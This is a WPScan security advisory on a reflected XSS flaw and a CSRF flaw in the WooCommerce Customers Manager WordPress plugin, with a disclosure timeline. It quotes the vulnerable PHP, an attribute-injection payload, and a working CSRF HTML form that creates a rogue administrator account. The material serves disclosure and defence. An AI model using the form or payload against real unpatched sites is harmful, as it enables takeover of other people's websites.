WooCommerce Customers Manager WordPress Plugin – Multiple Security Vulnerabilities


A member of the WPScan research team discovered two security vulnerabilities within the premium WooCommerce Customers Manager WordPress plugin, versions less than 26.6.

The following two vulnerabilities were identified and added to our WordPress vulnerability database:

Technical Details

While checking if a reported privilege escalation vulnerability was properly fixed, it was identified that the issue was still exploitable via a Cross-Site Request Forgery (CSRF) attack. An attempted fix for a second security issue, an Authenticated Cross-Site Scripting(XSS) vulnerability, was also found to not be sufficient, still allowing the attack.

At WPScan we work closely with plugin authors to ensure the fixes that they implement are done correctly, to ensure that our users are kept safe.

Authenticated Reflected Cross-Site Scripting (XSS)

The wccm_customers_ids and wccm_customers_emails parameters were output in href attributes, after being sanitised with the sanitize_text_field() function, which is not appropriate for such case, as payload such as ' injected-attribute=value will still be injected.

In classes/admin/WCCM_CustomerGuestList.php

<h2 class="nav-tab-wrapper">
  <a class='nav-tab' href='?page=woocommerce-customers-manager<?php if($this->filter_by_product_id >0) echo '&filter-by-product='.$this->filter_by_product_id; if(isset($_REQUEST['wccm_customers_ids'])) echo '&wccm_customers_ids='.sanitize_text_field($_REQUEST['wccm_customers_ids']);  if(isset($_REQUEST['wccm_customers_emails'])) echo '&wccm_customers_emails='.sanitize_text_field($_REQUEST['wccm_customers_emails']); echo '&wccm_already_encoded=yes'; ?>'>Registered</a>
  <a class='nav-tab nav-tab-active' href='?page=woocommerce-customers-manager&action=wccm-guests-list<?php if($this->filter_by_product_id >0) echo '&filter-by-product='.$this->filter_by_product_id; if(isset($_REQUEST['wccm_customers_ids'])) echo '&wccm_customers_ids='.sanitize_text_field($_REQUEST['wccm_customers_ids']); if(isset($_REQUEST['wccm_customers_emails'])) echo '&wccm_customers_emails='.sanitize_text_field($_REQUEST['wccm_customers_emails']);?>'>Guests</a>

Proof of Concept (PoC)

Log on to the blog as administraor and open the below URLs:

Arbitrary User Account Creation/Update via CSRF

The upload_csv AJAX action, available to authenticated users, did not have any CSRF check, allowing attackers to make logged in users with the manage_woocommerce capability (by default administrator) import arbitrary accounts. This could lead to rogue administrator accounts to be created and the blog being compromised.

In classes/admin/WCCM_CustomerImport.php

public function __construct()
  add_action( 'wp_ajax_upload_csv', array( &$this, 'process_csv_upload_ajax' ) );
function process_csv_upload_ajax()

  $csv_array = explode("<#>", $_POST['csv']);

Proof of Concept (PoC)

Log on to the blog, as a user with the manage_woocommerce capability (by default administrator), and open the HTML file below:

    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="action" value="upload_csv" />
      <input type="hidden" name="send-notification-email" value="no" />
      <input type="hidden" name="csv" value='ID","Password","Role","Login","Email"<#>"","Passw0rd","administrator","admin-attacker","admin-attacker@localhost.org"' />
      <input type="submit" value="Submit request" />

This will create a new administrator account, with the admin-attacker username.



  • March 11th, 2021 – Improper fixes identified and confirmed. Vendor contacted via http://www.domenicolagudi.com/#contact
  • March 16th, 2021 – No response from vendor, escalated to Envato.
  • March 17th, 2021 – v26.6 released, fixing the issues (confirmed on March 30th via source code provided by the vendor).
  • March 30th, 2021 – Vulnerabilities published on wpscan.com and sent out to our users.
  • April 8th, 2021 – This blog post released.

Leave a Reply